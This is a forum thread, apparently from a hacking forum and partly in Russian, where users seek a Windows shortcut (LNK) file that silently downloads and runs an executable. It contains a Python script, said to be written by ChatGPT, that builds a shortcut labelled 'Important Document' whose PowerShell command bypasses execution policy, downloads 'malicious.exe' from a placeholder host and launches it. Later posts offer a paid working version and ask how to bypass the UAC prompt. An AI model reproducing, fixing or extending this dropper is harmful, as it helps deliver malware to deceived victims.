LNK файл

[hk111]

Как с помощью lnk скачать exe файл который размещен на хостинге/в облачном хранилище, поместить его в папку temp и выполнить?

 

[ondatra227]

Можешь использовать вызов повершелла

 

[frankish]

on stackoverflow https://stackoverflow.com/questions/42762122/get-target-of-shortcut-lnk-file-with-powershell

 

[hk111]

Можешь использовать вызов повершелла

есть какие то примеры?

 

[Cyc199_77]

here is a script to create an LNK file that downloads and executes exe
Requirements : Python 2.7.2 , pylnk module
not properly tested , Made by CHATGPT
inspierd by : https://github.com/carnal0wnage/python_lnk_maker

import pylnk

sample

def create_malicious_lnk(filename):
    # Define the target executable (e.g., Windows Calculator)
    target_exe = "C:\\Windows\\System32\\calc.exe"

    # Define the URL of the remote executable (e.g., a potentially malicious file)
    remote_url = "http://example.com/malicious.exe"

    # Create a shortcut
    link = pylnk.for_file(target_exe)
    link.description = "Important Document"
    link.arguments = "/c powershell -NoProfile -ExecutionPolicy Bypass -Command Invoke-WebRequest '{}' -OutFile 'C:\\Windows\\Temp\\malicious.exe'; Start-Process 'C:\\Windows\\Temp\\malicious.exe'".format(remote_url)

    link.icon = target_exe
    link.save(filename)

create_malicious_lnk("malicious.lnk")

 

[ondatra227]

есть какие то примеры?

Выше уже скинули

 

[ondatra227]

here is a script to create an LNK file that downloads and executes exe
Requirements : Python 2.7.2 , pylnk module
not properly tested , Made by CHATGPT
inspierd by : https://github.com/carnal0wnage/python_lnk_maker

import pylnk

sample

def create_malicious_lnk(filename):
    # Define the target executable (e.g., Windows Calculator)
    target_exe = "C:\\Windows\\System32\\calc.exe"

    # Define the URL of the remote executable (e.g., a potentially malicious file)
    remote_url = "http://example.com/malicious.exe"

    # Create a shortcut
    link = pylnk.for_file(target_exe)
    link.description = "Important Document"
    link.arguments = "/c powershell -NoProfile -ExecutionPolicy Bypass -Command Invoke-WebRequest '{}' -OutFile 'C:\\Windows\\Temp\\malicious.exe'; Start-Process 'C:\\Windows\\Temp\\malicious.exe'".format(remote_url)

    link.icon = target_exe
    link.save(filename)

create_malicious_lnk("malicious.lnk")

Code not working

 

[Cyc199_77]

Code not working

what was the issue


I know there are experts here please help us..

 

[Cyc199_77]

any experts here in building LNK files ?

 

[r1z]

any experts here in building LNK files ?

write in PM or TOX, ready to fix & guaranteed working.

 

[Cyc199_77]

Are you suggesting to buy something .. we want to learn not buy a product

 

[vap0r]

Are you suggesting to buy something .. we want to learn not buy a product

this one is working and good to learn from it : https://github.com/xillwillx/tricky.lnk

 

[hk111]

при запуске LNK мы можем обойти окно "разрешить этому приложению вносить изменения на вашем устройстве"? какие аргументы использовать?